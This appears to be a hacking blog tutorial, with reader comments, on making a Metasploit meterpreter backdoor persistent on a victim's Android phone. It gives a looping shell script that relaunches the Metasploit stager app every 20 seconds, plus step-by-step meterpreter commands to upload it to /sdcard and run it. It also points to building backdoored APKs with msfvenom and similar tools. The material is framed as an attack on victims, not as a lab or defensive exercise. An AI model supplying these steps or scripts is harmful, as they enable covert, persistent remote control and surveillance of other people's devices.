Hello guys, today we’re going to show you that how you can create a persistent backdoor in android using Kali Linux after hacking with msfvenom.
Previously we discussed two methods through which you can hack any android device:
- Hack Android using Msfvenom in LAN/WAN
- Hack Android using Metasploit without Port-Forwarding over WAN using Ngrok
You can use any of the method above to hack the android device but once you get the meterpreter session, that session is not persistent, to make it persistent, you need to upload one shell script into any location of /sdcard directory.
Generally, your victim’s device is not rooted, so you can’t create any file in /etc/init.d directory due to less permissions, so we are using another method to upload a backdoor in /sdcard directory using shell command and then will execute the script which automatically makes a persistent backdoor in that android device.
Here are the steps which you need to follow:
First required part is to get the meterpreter session by using any of the method, there are alot of methods to build a backdoor .apk file like using TheFatRat, msfvenom and spade etc. You can use any of the method and get the meterpreter session.
As soon as you get the meterpreter session, you need to create a (.sh) file and paste the following code into it:
#!/bin/bash
while true
do am start –user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
sleep 20
done
And save it as anyname.sh
here’s the updated version of above shell script which is 100% compatible with all android versions:
#!/bin/bash
while :
do am start –user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
sleep 20
done
After that you need to get into root directory of android device by typing “cd /” in terminal.
Now you need to get into /sdcard location by typing “cd /sdcard” in same terminal.
Here you can upload your backdoored script by typing “upload yeahhub-backdoor.sh” in same terminal.
Now all we have to do is execute the script once, and then everything will be done automatically, type “shell” to enter into system’s shell mode of android device.
Here you need to again go into same location i.e. cd /root/sdcard and execute the backdoor using “sh yeahhub-backdoor.sh“.
In above screenshot, as you can see, your script has been executed successfully, you can terminate the execution by pressing CTRL + C and then type Y.
You can test it by exiting from meterpreter and again setting up a Listener. You should get a meterpreter prompt automatically as shown in above screen.
The persistent of the backdoor will only remain until a reboot of the android system. If your victim is in same network i.e. LAN, then the persistence will remain forever on LAN and if you have static IP, then also your persistence will remain forever on WAN too.
You may also like:
- Most Common DNS Record Types and Their Roles
- Top Skills Needed to Become a Cybersecurity Analyst
- Mastering Windows Management with WMIC Commands – Top 20 Examples
- Edit and Compile Code with the Best 5 Code Editors
- 50+ Top DevSecOps Tools You Need To Know
- Learn How to Add Proxy and Multiple Accounts in MoreLogin
- Some Useful PowerShell Cmdlets
- Create Free SSL Certificate – ZEROSSL.COM [2020 Tutorial]
- Generate Self-Signed SSL Certificate with OPENSSL in Kali Linux
- RDP – CredSSP Encryption Oracle Remediation Solution 2020
if i have static ip, does it’ll remain forever even after reboot?
how to edit this script for another android binded app plezz must replay
Is the –user 0 a zero, or the letter O (the capital O).
It looks like a zero to me, but it’s hard to tell